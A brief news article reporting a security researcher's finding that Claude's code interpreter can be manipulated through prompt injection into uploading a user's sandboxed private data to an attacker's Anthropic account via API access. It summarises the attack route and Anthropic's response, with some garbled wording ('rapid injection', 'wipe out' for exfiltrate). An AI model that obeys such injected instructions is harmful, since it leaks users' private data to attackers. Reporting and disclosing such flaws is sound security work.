Claude can be tricked into sending your private company data to hackers – all it takes is a few kind words


  • Claude’s code interpreter can be exploited to exfiltrate private user data via rapid injection
  • Researcher tricked Claude into uploading sandboxed data to his Anthropic account using API access
  • Anthropic now treats such vulnerabilities as reportable and encourages users to monitor or disable access

Claude, one of the more popular AI tools out there, has a vulnerability that allows threat actors to wipe out private user data, experts have warned.

Cybersecurity researcher Johann Rehberger, AKA Wunderwuzzi, who recently wrote an in-depth report on his findings, finding the root of the problem is Claude’s Code Interpreter, a sandbox environment that lets AI write and run code (for example, to analyze data or generate files) directly in a conversation.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top